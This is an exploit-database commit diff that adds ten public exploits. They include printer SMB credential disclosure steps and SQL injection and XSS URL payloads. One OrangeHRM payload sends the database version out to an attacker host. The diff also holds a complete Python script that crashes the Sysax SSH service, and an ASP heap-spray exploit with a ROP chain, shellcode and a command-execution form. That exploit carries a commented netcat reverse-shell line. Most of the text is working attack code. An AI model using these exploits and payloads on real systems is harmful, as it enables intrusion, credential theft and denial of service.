DB: 2015-08-30

10 new exploits
This commit is contained in:
Offensive Security 2015-08-30 05:02:01 +00:00
parent d891c95c0e
commit 4fe29b09c1
11 changed files with 799 additions and 0 deletions

View file

@ -34314,3 +34314,13 @@ id,file,description,date,author,platform,type,port
37999,platforms/java/webapps/37999.txt,"Jenkins 1.626 - Cross Site Request Forgery / Code Execution",2015-08-28,smash,java,webapps,0
38000,platforms/php/webapps/38000.txt,"Wolf CMS Arbitrary File Upload To Command Execution",2015-08-28,"Narendra Bhati",php,webapps,80
38002,platforms/php/webapps/38002.txt,"Pluck CMS 4.7.3 - Multiple Vulnerabilities",2015-08-28,smash,php,webapps,80
38004,platforms/hardware/webapps/38004.txt,"Samsung SyncThruWeb 2.01.00.26 - SMB Hash Disclosure",2015-08-29,"Shad Malloy",hardware,webapps,80
38005,platforms/windows/remote/38005.asp,"MS SQL Server 2000/2005 SQLNS.SQLNamespace COM Object Refresh() Unhandled Pointer Exploit",2015-08-29,ylbhz,windows,remote,0
38006,platforms/php/webapps/38006.txt,"bloofoxCMS 0.3.5 Multiple Cross Site Scripting Vulnerabilities",2012-10-31,"Canberk BOLAT",php,webapps,0
38007,platforms/php/webapps/38007.txt,"DCForum auth_user_file.txt File Multiple Information Disclosure Vulnerabilities",2012-11-02,r45c4l,php,webapps,0
38008,platforms/php/webapps/38008.txt,"Joomla! com_parcoauto Component 'idVeicolo' Parameter Remote SQL Injection Vulnerability",2012-11-03,"Andrea Bocchetti",php,webapps,0
38009,platforms/php/webapps/38009.txt,"AWAuctionScript CMS Multiple Remote Vulnerabilities",2012-11-04,X-Cisadane,php,webapps,0
38010,platforms/php/webapps/38010.txt,"VeriCentre Multiple SQL Injection Vulnerabilities",2012-11-06,"Cory Eubanks",php,webapps,0
38011,platforms/php/webapps/38011.txt,"OrangeHRM 'sortField' Parameter SQL Injection Vulnerability",2012-11-07,"High-Tech Bridge",php,webapps,0
38012,platforms/php/webapps/38012.txt,"WordPress FLV Player Plugin 'id' Parameter SQL Injection Vulnerability",2012-11-07,"Ashiyane Digital Security Team",php,webapps,0
38014,platforms/windows/dos/38014.py,"Sysax Multi Server 6.40 SSH Component Denial of Service",2015-08-29,3unnym00n,windows,dos,22

Can't render this file because it is too large.

View file

@ -0,0 +1,97 @@
# Exploit Title: Samsung SyncThruWeb SMB Hash Disclosure
# Date: 8/28/15
# Exploit Author: Shad Malloy
# Contact: http://twitter.com/SecureNM
# Website: https://securenetworkmanagement.com
# Vendor Homepage: http://www.samsung.com
# Software Link:
http://www.samsung.com/hk_en/consumer/solutions/type/SyncThruWebService.html
# Version: Known Vulnerable versions Samsung SCX-5835_5935 Series Printer
Main Firmware Version : 2.01.00.26
Samsung SCX-5635 Series Printer Main Firmware Version : 2.01.01.18
12-08-2009
# Tested on:
Samsung SCX-5835_5935 Series Printer
Main Firmware Version : 2.01.00.26
Network Firmware Version : V4.01.05(SCX-5835/5935)
12-22-2008
Engine Firmware Version : 1.20.73
UI Firmware Version : V1.03.01.55 07-13-2009
Finisher Firmware Version : Not Installed
PCL5E Firmware Version : PCL5e 5.87 11-07-2008
PCL6 Firmware Version : PCL6 5.86 10-28-2008
PostScript Firmware Version : PS3 V1.93.06 12-19-2008
SPL Firmware Version : SPL 5.32 01-03-2008
TIFF Firmware Version : TIFF 0.91.00 10-07-2008
Samsung SCX-5635 Series
Main Firmware Version : 2.01.01.18 12-08-2009
Network Firmware Version : V4.01.16(SCX-5635)
12-04-2009
Engine Firmware Version : 1.31.32
PCL5E Firmware Version : PCL5e 5.92 02-12-2009
PCL6 Firmware Version : PCL6 5.93 03-21-2009
PostScript Firmware Version : PS3 1.94.06 12-22-2008
TIFF Firmware Version : TIFF 0.91.00 10-07-2008
Proof of Concept
1. Using the default username and password (admin/admin), it is
possible to obtain all credentials used for SMB file transfer. To obtain the
file access http://<printer url>/smb_serverList.csv.
2. The UserName and UserPassword fields are unencrypted and
visible using any text editor.
Relevant Patches
http://downloadcenter.samsung.com/content/FM/201508/20150825111208555/SCX563
5_V2.01.01.28_0401113_1.00.zip
http://downloadcenter.samsung.com/content/FM/201508/20150825112233867/SCX583
5_5935_V2.01.00.56_0401113_1.01.zip
Shad Malloy
Secure Network Management, LLC

10
platforms/php/webapps/38006.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/56353/info
bloofoxCMS is prone to multiple cross-site scripting vulnerabilities because it fails to sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
bloofoxCMS 0.3.5 is vulnerable; other versions may also be affected.
http://www.example.com/index.php?'"--><script>alert(0x0004B3)</script>
http://www.example.com/index.php?search='"--><script>alert(0x0004B3)</script>

View file

@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/56383/info
DCForum is prone to multiple information-disclosure vulnerabilities.
Exploiting these issues may allow an attacker to obtain sensitive information that may aid in further attacks.
http://www.example.com/cgi-bin/User_info/auth_user_file.txt
http://www.example.com/cgi-bin/dcforum/User_info/auth_user_file.txt

View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/56384/info
The Parcoauto component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/index.php?option=com_parcoauto&action=scheda&idVeicolo=2658810

13
platforms/php/webapps/38009.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/56388/info
AWAuctionScript CMS is prone to the following remote vulnerabilities because it fails to sufficiently sanitize user-supplied data:
1. A remote SQL-injection vulnerability.
2. A remote file-upload vulnerability.
3. An HTML-injection vulnerability.
Exploiting these issues could allow an attacker to execute arbitrary script code, upload arbitrary files, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
AWAuctionScript 1.0 is vulnerable; other version may also be affected.
http://www.example.com/listing.php?category=Website&PageNo=-1'[SQL-Injection Vulnerability!]

10
platforms/php/webapps/38010.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/56409/info
VeriCentre is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
VeriCentre versions prior to 2.2 build 36 are vulnerable.
http://www.example.com/WebConsole/terminal/paramedit.aspx?TerminalId=%27%2bconvert%28int,@
@version%29%2b%27&ModelName=xxxx&ApplicationName=xxxx&ClusterId=

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/56417/info
OrangeHRM is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
OrangeHRM 2.7.1-rc.1 is vulnerable; other versions may also be affected.
http://www.example.com/symfony/web/index.php/admin/viewCustomers?sortOrder=ASC&sortField=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHA R(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114 ))))

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/56418/info
The FLV Player plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
FLV Player 1.1 is vulnerable; other versions may also be affected.
http://www.example.com/wp-content/plugins/hitasoft_player/config.php?id=1%20union%20all%20select%201,2,3,4,5,6,7,8,user_login,10,11,12,13,14,15,16,17 from wp_users--

481
platforms/windows/dos/38014.py Executable file
View file

@ -0,0 +1,481 @@
'''
# Exploit title: Sysax Multi Server 6.40 ssh component denial of service vulnerability
# Date: 29-8-2015
# Vendor homepage: http://www.sysax.com
# Software Link: http://www.sysax.com/download/sysaxserv_setup.msi
# Version: 6.40
# Author: 3unnym00n
# Details:
# ----------------------------------------------
# byte SSH_MSG_USERAUTH_REQUEST
# string user name
# string service
# string "password"
# boolean FALSE
# Sysax Multi ssh Server doesn't correctly handle SSH_MSG_USERAUTH_REQUEST packet , when the "user name" length malformed can lead dos
# Tested On: win7, xp
# operating steps:
1. install Sysax Multi Server
2. manage server setting > connection protocols confugure > ssh2 based secure shell and sftp/scp on port 22
3. restart the server to let the configuration take effect
4. modify the hostname in this py.
5. running the py, the py will raise exception: sock.recv(block_size) socket.error: [Errno 10054]
netstat -ano , the "22" disappeared.
running the py again, u will see connect failed socket.error: [Errno 10061]
# remark: u can also modify the user auth service request packet, to adjust different user, different password
'''
import socket
import struct
import os
from StringIO import StringIO
from hashlib import sha1
from Crypto.Cipher import Blowfish, AES, DES3, ARC4
from Crypto.Util import Counter
from hmac import HMAC
## suppose server accept our first dh kex: diffie-hellman-group14-sha1
P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AACAA68FFFFFFFFFFFFFFFF
G = 2
__sequence_number_out = 3
zero_byte = chr(0)
one_byte = chr(1)
four_byte = chr(4)
max_byte = chr(0xff)
cr_byte = chr(13)
linefeed_byte = chr(10)
crlf = cr_byte + linefeed_byte
class Message (object):
"""
An SSH2 message is a stream of bytes that encodes some combination of
strings, integers, bools, and infinite-precision integers (known in Python
as longs). This class builds or breaks down such a byte stream.
Normally you don't need to deal with anything this low-level, but it's
exposed for people implementing custom extensions, or features that
paramiko doesn't support yet.
"""
big_int = long(0xff000000)
def __init__(self, content=None):
"""
Create a new SSH2 message.
:param str content:
the byte stream to use as the message content (passed in only when
decomposing a message).
"""
if content is not None:
self.packet = StringIO(content)
else:
self.packet = StringIO()
def __str__(self):
"""
Return the byte stream content of this message, as a string/bytes obj.
"""
return self.asbytes()
def __repr__(self):
"""
Returns a string representation of this object, for debugging.
"""
return 'paramiko.Message(' + repr(self.packet.getvalue()) + ')'
def asbytes(self):
"""
Return the byte stream content of this Message, as bytes.
"""
return self.packet.getvalue()
def add_bytes(self, b):
"""
Write bytes to the stream, without any formatting.
:param str b: bytes to add
"""
self.packet.write(b)
return self
def add_byte(self, b):
"""
Write a single byte to the stream, without any formatting.
:param str b: byte to add
"""
self.packet.write(b)
return self
def add_boolean(self, b):
"""
Add a boolean value to the stream.
:param bool b: boolean value to add
"""
if b:
self.packet.write(one_byte)
else:
self.packet.write(zero_byte)
return self
def add_size(self, n):
"""
Add an integer to the stream.
:param int n: integer to add
"""
self.packet.write(struct.pack('>I', n))
return self
def add_int(self, n):
"""
Add an integer to the stream.
:param int n: integer to add
"""
if n >= Message.big_int:
self.packet.write(max_byte)
self.add_string(deflate_long(n))
else:
self.packet.write(struct.pack('>I', n))
return self
def add_int(self, n):
"""
Add an integer to the stream.
@param n: integer to add
@type n: int
"""
if n >= Message.big_int:
self.packet.write(max_byte)
self.add_string(deflate_long(n))
else:
self.packet.write(struct.pack('>I', n))
return self
def add_int64(self, n):
"""
Add a 64-bit int to the stream.
:param long n: long int to add
"""
self.packet.write(struct.pack('>Q', n))
return self
def add_mpint(self, z):
"""
Add a long int to the stream, encoded as an infinite-precision
integer. This method only works on positive numbers.
:param long z: long int to add
"""
self.add_string(deflate_long(z))
return self
def add_string(self, s):
"""
Add a string to the stream.
:param str s: string to add
"""
self.add_size(len(s))
self.packet.write(s)
return self
def add_list(self, l):
"""
Add a list of strings to the stream. They are encoded identically to
a single string of values separated by commas. (Yes, really, that's
how SSH2 does it.)
:param list l: list of strings to add
"""
self.add_string(','.join(l))
return self
def _add(self, i):
if type(i) is bool:
return self.add_boolean(i)
elif isinstance(i, int):
return self.add_int(i)
elif type(i) is list:
return self.add_list(i)
else:
return self.add_string(i)
def add(self, *seq):
"""
Add a sequence of items to the stream. The values are encoded based
on their type: str, int, bool, list, or long.
.. warning::
Longs are encoded non-deterministically. Don't use this method.
:param seq: the sequence of items
"""
for item in seq:
self._add(item)
def deflate_long(n, add_sign_padding=True):
"""turns a long-int into a normalized byte string (adapted from Crypto.Util.number)"""
# after much testing, this algorithm was deemed to be the fastest
s = bytes()
n = long(n)
while (n != 0) and (n != -1):
s = struct.pack('>I', n & long(0xffffffff)) + s
n >>= 32
# strip off leading zeros, FFs
for i in enumerate(s):
if (n == 0) and (i[1] != chr(0)):
break
if (n == -1) and (i[1] != chr(0xff)):
break
else:
# degenerate case, n was either 0 or -1
i = (0,)
if n == 0:
s = chr(0)
else:
s = chr(0xff)
s = s[i[0]:]
if add_sign_padding:
if (n == 0) and (ord(s[0]) >= 0x80):
s = chr(0) + s
if (n == -1) and (ord(s[0]) < 0x80):
s = chr(0xff) + s
return s
def inflate_long(s, always_positive=False):
"""turns a normalized byte string into a long-int (adapted from Crypto.Util.number)"""
out = long(0)
negative = 0
if not always_positive and (len(s) > 0) and (ord(s[0]) >= 0x80):
negative = 1
if len(s) % 4:
filler = chr(0)
if negative:
filler = chr(0xff)
# never convert this to ``s +=`` because this is a string, not a number
# noinspection PyAugmentAssignment
s = filler * (4 - len(s) % 4) + s
for i in range(0, len(s), 4):
out = (out << 32) + struct.unpack('>I', s[i:i+4])[0]
if negative:
out -= (long(1) << (8 * len(s)))
return out
def byte_mask(c, mask):
return chr(ord(c) & mask)
def _compute_key(K, H, session_id, id, nbytes):
"""id is 'A' - 'F' for the various keys used by ssh"""
m = Message()
m.add_mpint(K)
m.add_bytes(H)
m.add_byte(str(id))
m.add_bytes(session_id)
out = sofar = sha1(m.asbytes()).digest()
while len(out) < nbytes:
m = Message()
m.add_mpint(K)
m.add_bytes(H)
m.add_bytes(sofar)
digest = sha1(m.asbytes()).digest()
out += digest
sofar += digest
return out[:nbytes]
def compute_hmac(key, message, digest_class):
return HMAC(key, message, digest_class).digest()
def read_msg(sock, block_engine_in, block_size, mac_size):
header = sock.recv(block_size)
header = block_engine_in.decrypt(header)
packet_size = struct.unpack('>I', header[:4])[0]
leftover = header[4:]
buf = sock.recv(packet_size + mac_size - len(leftover))
packet = buf[:packet_size - len(leftover)]
post_packet = buf[packet_size - len(leftover):]
packet = block_engine_in.decrypt(packet)
packet = leftover + packet
def send_msg(sock, raw_data, block_engine_out, mac_engine_out, mac_key_out, mac_size):
global __sequence_number_out
out = block_engine_out.encrypt(raw_data)
payload = struct.pack('>I', __sequence_number_out) + raw_data
out += compute_hmac(mac_key_out, payload, mac_engine_out)[:mac_size]
sock.send(out)
__sequence_number_out += 1
def exploit(hostname, port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((hostname, port))
## send client banner
client_banner = 'SSH-2.0-SUCK\r\n'
sock.send(client_banner)
## recv server banner
server_banner = ''
while True:
data = sock.recv(1)
if data == '\x0a':
break
server_banner += data
print 'server banner is: ', server_banner.__repr__()
## do key exchange
## send client algorithms
cookie = os.urandom(16)
client_kex = '000001cc0514'.decode('hex') + cookie + '000000596469666669652d68656c6c6d616e2d67726f757031342d736861312c6469666669652d68656c6c6d616e2d67726f75702d65786368616e67652d736861312c6469666669652d68656c6c6d616e2d67726f7570312d73686131000000237373682d7273612c7373682d6473732c65636473612d736861322d6e69737470323536000000576165733132382d6374722c6165733235362d6374722c6165733132382d6362632c626c6f77666973682d6362632c6165733235362d6362632c336465732d6362632c617263666f75723132382c617263666f7572323536000000576165733132382d6374722c6165733235362d6374722c6165733132382d6362632c626c6f77666973682d6362632c6165733235362d6362632c336465732d6362632c617263666f75723132382c617263666f75723235360000002b686d61632d736861312c686d61632d6d64352c686d61632d736861312d39362c686d61632d6d64352d39360000002b686d61632d736861312c686d61632d6d64352c686d61632d736861312d39362c686d61632d6d64352d3936000000046e6f6e65000000046e6f6e65000000000000000000000000000000000000'.decode('hex')
sock.send(client_kex)
client_kex_init = client_kex[5:-5]
## recv server algorithms
server_kex = ''
str_pl = sock.recv(4)
pl = struct.unpack('>I', str_pl)[0]
tmp = sock.recv(pl)
padding_len = ord(tmp[0])
server_kex_init = tmp[1:-padding_len]
## do dh kex
## send client dh kex
x = 2718749950853797850634218108087830670950606437648125981418769990607126772940049948484122336910062802584089370382091267133574445173294378254000629897200925498341633999513190035450218329607097225733329543524028305346861620006860852918487068859161361831623421024322904154569598752827192453199975754781944810347
e = 24246061990311305114571813286712069338300342406114182522571307971719868860460945648993499340734221725910715550923992743644801884998515491806836377726946636968365751276828870539451268214005738703948104009998575652199698609897222885198283575698226413251759742449790092874540295563182579030702610986594679727200051817630511413715723789617829401744474112405554024371460263485543685109421717171156358397944976970310869333766947439381332202584288225313692797532554689171177447651177476425180162113468471927127194797168639270094144932251842745747512414228391665092351122762389774578913976053048427148163469934452204474329639
client_dh_kex = '0000010c051e0000010100c010d8c3ea108d1915c9961f86d932f3556b82cd09a7e1d24c88f7d98fc88b19ca3908cada3244dfc5534860b967019560ce5ee243007d41ecf68e9bfa7631847ecb1091558fd7ffe2f17171115690a6d10f3b62c317157ced9291770cc452cc93fb911f18de644ef988c09a3bff35770e99d1546d31c320993f8c12bb275cd2742afc547a0f3309c29a6e72611af965b6144b837ca2003c3ca1f3e35797ab143669b9034c575794c645383519d485a133e67d0793097ef08b72523fa3199c35358676d1fd9776248cae08e46da6414d0f975ffa4b4c84f69db86c47401808daa8a5919fc52ebed157b99e0dd2a4203f0c9e06d6395fa5c9b38a7ae8b159ea270000000000'.decode('hex')
sock.send(client_dh_kex)
## recv server dh kex
str_pl = sock.recv(4)
pl = struct.unpack('>I', str_pl)[0]
server_dh_kex = sock.recv(pl)
## send client newkeys
client_newkeys = '0000000c0a1500000000000000000000'.decode('hex')
sock.send(client_newkeys)
## recv server newkeys
str_pl = sock.recv(4)
pl = struct.unpack('>I', str_pl)[0]
server_new_keys = sock.recv(pl)
## calc all we need ...
host_key_len = struct.unpack('>I', server_dh_kex[2:6])[0]
# print host_key_len
host_key = server_dh_kex[6:6 + host_key_len]
f_len = struct.unpack('>I', server_dh_kex[6 + host_key_len:10 + host_key_len])[0]
str_f = server_dh_kex[10 + host_key_len:10 + host_key_len + f_len]
dh_server_f = inflate_long(str_f)
sig_len = struct.unpack('>I', server_dh_kex[10 + host_key_len + f_len:14 + host_key_len + f_len])[0]
sig = server_dh_kex[14 + host_key_len + f_len:14 + host_key_len + f_len + sig_len]
K = pow(dh_server_f, x, P)
## build up the hash H of (V_C || V_S || I_C || I_S || K_S || e || f || K), aka, session id
hm = Message()
hm.add(client_banner.rstrip(), server_banner.rstrip(),
client_kex_init, server_kex_init)
hm.add_string(host_key)
hm.add_mpint(e)
hm.add_mpint(dh_server_f)
hm.add_mpint(K)
H = sha1(hm.asbytes()).digest()
## suppose server accept our first cypher: aes128-ctr, hmac-sha1
block_size = 16
key_size = 16
mac_size = 20
IV_out = _compute_key(K, H, H, 'A', block_size)
key_out = _compute_key(K, H, H, 'C', key_size)
block_engine_out = AES.new(key_out, AES.MODE_CTR, IV_out, Counter.new(nbits=block_size * 8, initial_value=inflate_long(IV_out, True)))
mac_engine_out = sha1
mac_key_out = _compute_key(K, H, H, 'E', mac_engine_out().digest_size)
IV_in = _compute_key(K, H, H, 'B', block_size)
key_in = _compute_key(K, H, H, 'D', key_size)
block_engine_in = AES.new(key_in, AES.MODE_CTR, IV_in, Counter.new(nbits=block_size * 8, initial_value=inflate_long(IV_in, True)))
mac_engine_in = sha1
mac_key_in = _compute_key(K, H, H, 'F', mac_engine_in().digest_size)
## do user auth
## send client service request (user auth)
client_service_request = '\x00\x00\x00\x1C\x0A\x05\x00\x00\x00\x0C\x73\x73\x68\x2D\x75\x73\x65\x72\x61\x75\x74\x68\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
## encrypt the packet
send_msg(sock, client_service_request, block_engine_out, mac_engine_out, mac_key_out, mac_size)
## recv server service accept
read_msg(sock, block_engine_in, block_size, mac_size)
## send client userauth request
client_userauth_request = '\x00\x00\x00\x3C\x08\x32'
## the user name length and username
client_userauth_request += '\x00\x00\x32\xe4' # malformed
client_userauth_request += 'root'
## service
client_userauth_request += '\x00\x00\x00\x0E'
client_userauth_request += 'ssh-connection'
## password
client_userauth_request += '\x00\x00\x00\x08'
client_userauth_request += 'password'
client_userauth_request += '\x00'
## plaintext password fuckinA
client_userauth_request += '\x00\x00\x00\x07'
client_userauth_request += 'fuckinA'
## padding
client_userauth_request += '\x00'*8
## encrypt the packet
print 'send client_userauth_request'
send_msg(sock, client_userauth_request, block_engine_out, mac_engine_out, mac_key_out, mac_size)
## recv server userauth success
print 'recv server userauth success'
read_msg(sock, block_engine_in, block_size, mac_size)
if __name__ == '__main__':
hostname = '192.168.242.128'
port = 22
exploit(hostname, port)

View file

@ -0,0 +1,145 @@
<%
Function Padding(intLen)
Dim strRet, intSize
intSize = intLen/2 - 1
For I = 0 To intSize Step 1
strRet = strRet & unescape("%u4141")
Next
Padding = strRet
End Function
Function PackDWORD(strPoint)
strTmp = replace(strPoint, "0x", "")
PackDWORD = PackDWORD & UnEscape("%u" & Mid(strTmp, 5, 2) & Mid(strTmp, 7, 2))
PackDWORD = PackDWORD & UnEscape("%u" & Mid(strTmp, 1, 2) & Mid(strTmp, 3, 2))
End Function
Function PackList(arrList)
For Each Item In arrList
PackList = PackList & PackDWORD(Item)
Next
End Function
Function PackShellcode(strCode)
intLen = Len(strCode) / 4
If intLen Mod 2 = 1 Then
strCode = strCode & "\x90"
intLen = intLen + 1
End If
arrTmp = Split(strCode, "\x")
For I = 1 To UBound(arrTmp) Step 2
PackShellcode = PackShellcode & UnEscape("%u" & arrTmp(I + 1) & arrTmp(I))
Next
End Function
Function UnicodeToAscii(uStrIn)
intLen = Len(strCommand)
If intLen Mod 2 = 1 Then
For I = 1 To intLen - 1 Step 2
UnicodeToAscii = UnicodeToAscii & "%u" & Hex(Asc(Mid(strCommand, I + 1, 1))) & Hex(Asc(Mid(strCommand, I, 1)))
Next
UnicodeToAscii = UnicodeToAscii & "%u00" & Hex(Asc(Mid(strCommand, I, 1)))
Else
For I = 1 To intLen - 1 Step 2
UnicodeToAscii = UnicodeToAscii & "%u" & Hex(Asc(Mid(strCommand, I + 1, 1))) & Hex(Asc(Mid(strCommand, I, 1)))
Next
End If
UnicodeToAscii = UnEscape(UnicodeToAscii & "%u0000%u0000")
End Function
'''''''''''''''''''''''''''''bypass DEP with [msvcr71.dll] 92 bytes
Rop_Chain = Array(_
"0x41414141", _
"0x7c373ab6", _
"0x7c3425bc", _
"0x7c376fc5", _
"0x7c343423", _
"0x7c3415a2", _
"0x7c373ab6", _
"0x41414141", _
"0x41414141", _
"0x41414141", _
"0x41414141", _
"0x7c344dbe", _
"0x7c376fc5", _
"0x7c373ab6", _
"0x7c373ab6", _
"0x7c351cc5", _
"0x7c3912a3", _
"0x7c3427e5", _
"0x7c346c0b", _
"0x7c3590be", _
"0x7c37a151", _
"0x7c378c81", _
"0x7c345c30" _
)
Small_Shellcode = "\x64\x8B\x25\x00\x00\x00\x00\xeb\x07\x90\x90\x90"
'0C0C0C6C 64:8B25 00000000 MOV ESP,DWORD PTR FS:[0]
'0C0C0C73 EB 07 JMP SHORT 0C0C0C7C
'0C0C0C75 90 NOP
'0C0C0C76 90 NOP
'0C0C0C77 90 NOP
'12 bytes
Fix_ESP = "\x83\xEC\x24\x8B\xEC\x83\xC5\x30"
'0C0C0C7C 83EC 24 SUB ESP,24
'0C0C0C7F 8BEC MOV EBP,ESP
'0C0C0C81 83C5 30 ADD EBP,30
'8 bytes
'''''''''''''''''''''''''''''shellcode WinExec (win2k sp2)
Real_Shellcode = "\xd9\xee\x9b\xd9\x74\x24\xf4\x5e\x83\xc6\x1a\x33\xc0\x50\x56\x68\x41\x41\x41\x41\x68\x16\x41\x86\x7c\xc3"
'D9EE FLDZ
'9B WAIT
'D97424 F4 FSTENV (28-BYTE) PTR SS:[ESP-C]
'5E POP ESI
'83C6 1a ADD ESI,1a
'33C0 XOR EAX,EAX
'50 PUSH EAX
'56 PUSH ESI
'68 F1F8807C PUSH kernel32.ExitThread
'68 1641867C PUSH kernel32.WinExec
'C3 RETN
'''''''''''''''''''''''''''''main
Dim strCmd
strCmd = Request("cmd")
strCommand = "cmd.exe /q /c " & strCmd
'strCommand = "C:\Inetpub\wwwroot\nc.exe -e cmd.exe 192.168.194.1 8080"
strOpcode = PackShellcode(Real_Shellcode) & UnicodeToAscii(strCommand)
intOpcode = Len(strOpcode)
Payload = String((1000/2), UnEscape("%u4141")) & PackDWORD("0x0c0c0c0c") & PackList(Rop_Chain) & PackShellcode(Small_Shellcode) & PackDWORD("0x5a64f0fe") &_
PackShellcode(Fix_ESP) & strOpcode &_
Padding(928 - intOpcode*2)
'Response.Write Len(Payload)
Dim Block
For N = 1 to 512
Block = Block & Payload
Next
Dim spary()
For I = 0 To 200 Step 1
Redim Preserve spary(I)
spary(I) = Block
Next
If strCmd = "" Then
Response.Write "Please Input command! <br />"
Else
Set obj = CreateObject("SQLNS.SQLNamespace")
Response.Write "Try to Execute: " & strCommand
arg1 = 202116108 '0x0c0c0c0c
obj.Refresh arg1
End If
%>
<html><head><title>Microsoft SQL Server 2000 SP4 SQLNS.SQLNamespace COM object Refresh() Pointer Error Exploit(DEP bypass)</title>
<body>
<p>
Microsoft SQL Server 2000 SP4 SQLNS.SQLNamespace COM object Refresh() Pointer Error Exploit(DEP bypass) <br />
Other version not test :) <br />
Bug found and Exploit by ylbhz@hotmail.com At 2012/04/03<br />
</P>
<form action="" method="post">
Program to Execute:<input type="text" value="<%=strCmd%>"size=120 name="cmd"></input><input type="submit" value="Exploit">
</form>
</form>